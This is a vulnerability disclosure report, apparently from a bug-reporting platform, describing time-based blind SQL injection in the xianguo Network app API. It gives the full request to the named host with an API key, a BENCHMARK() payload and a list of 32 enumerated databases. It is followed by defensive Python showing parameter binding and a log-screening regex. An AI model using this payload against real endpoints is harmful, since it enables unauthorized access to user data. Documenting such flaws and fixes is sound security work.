The official app of xianguo Network has SQL injection (across 32 databases, including a large user database)
App security: SQL injection
Target: the official app of xianguo Network
SQL injection exists at the following location (the sectionid POST parameter; time-based blind injection):
POST http://api.xianguo.com/i/status/get.json?key=36d979af3f6cecd87b89720d3284d420 HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; ZTE Grand S MIUI/V5)
Host: api.xianguo.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 335

devicemodel=TEST&count=1&isThumb=1&sinceid=1452294473&sectionid=186&devicetype=5&isShowContent=1&udid=A0000000000000&sectiontype=31&version=77&
Payload:
sectionid=if(1=1,BENCHMARK(3000000,ENCODE('HELLO','GOODBYE')),0)
I don't know why sqlmap didn't run, so I wrote a Python script.
1. List the current database users
2. List the current database
3. List all databases, 32 in total. The user database presumably holds a large amount of user data; this was not examined further.
analytic, bangbook_new, book_novel, books, client, digital_market, feed, gdcnc, groups, igoli, information_schema, life_stream, life_stream_doings, life_stream_doings_meta, life_stream_follow, life_stream_link, life_stream_public, line, metadata, mysql, novel_spider, partner, recommend, remark, samsung, short_url, snslog, spider, taggroup, test, user, wordpress
Solution:
Please kindly advise ~
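The fix the report leaves open is input validation plus parameter binding for sectionid. The following is an added example, not code from xianguo or from the reporter: it contrasts the string-splicing anti-pattern with a hardened query against a constructed in-memory table (assumed table name and columns), and adds a log-screening check for the BENCHMARK()/SLEEP() style of time-based probe shown above.

```python
import re
import sqlite3

# Matches time-based blind probes such as the BENCHMARK() payload in this
# report. Intended for screening request logs, not as the security control.
TIME_PROBE = re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.IGNORECASE)

def looks_like_time_probe(value: str) -> bool:
    """Return True if a parameter value carries a BENCHMARK()/SLEEP() call."""
    return TIME_PROBE.search(value) is not None

def parse_sectionid(raw: str) -> int:
    """Validate sectionid as a plain non-negative integer; anything else is
    rejected before it can reach SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError(f"invalid sectionid: {raw!r}")
    return int(raw)

def build_vulnerable_sql(raw: str) -> str:
    """The anti-pattern: the raw parameter is spliced into the query text,
    so an injected expression becomes part of the WHERE clause."""
    return f"SELECT id, title FROM status WHERE sectionid = {raw}"

def fetch_status(conn: sqlite3.Connection, raw_sectionid: str, count: int):
    """Hardened version: validate the value, then bind it as a parameter so
    the database engine never interprets it as SQL."""
    sectionid = parse_sectionid(raw_sectionid)
    cur = conn.execute(
        "SELECT id, title FROM status WHERE sectionid = ? ORDER BY id LIMIT ?",
        (sectionid, count),
    )
    return cur.fetchall()

def demo_connection() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the API's status table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE status (id INTEGER, sectionid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO status VALUES (?, ?, ?)",
                     [(1, 186, "first"), (2, 186, "second"), (3, 31, "other")])
    return conn

if __name__ == "__main__":
    payload = "if(1=1,BENCHMARK(3000000,ENCODE('HELLO','GOODBYE')),0)"
    conn = demo_connection()
    print(build_vulnerable_sql(payload))   # BENCHMARK() lands inside the query text
    print(looks_like_time_probe(payload))  # True
    print(fetch_status(conn, "186", 1))    # [(1, 'first')]
```

Passing the report's payload to fetch_status() raises ValueError at parse_sectionid(), so the query is never executed.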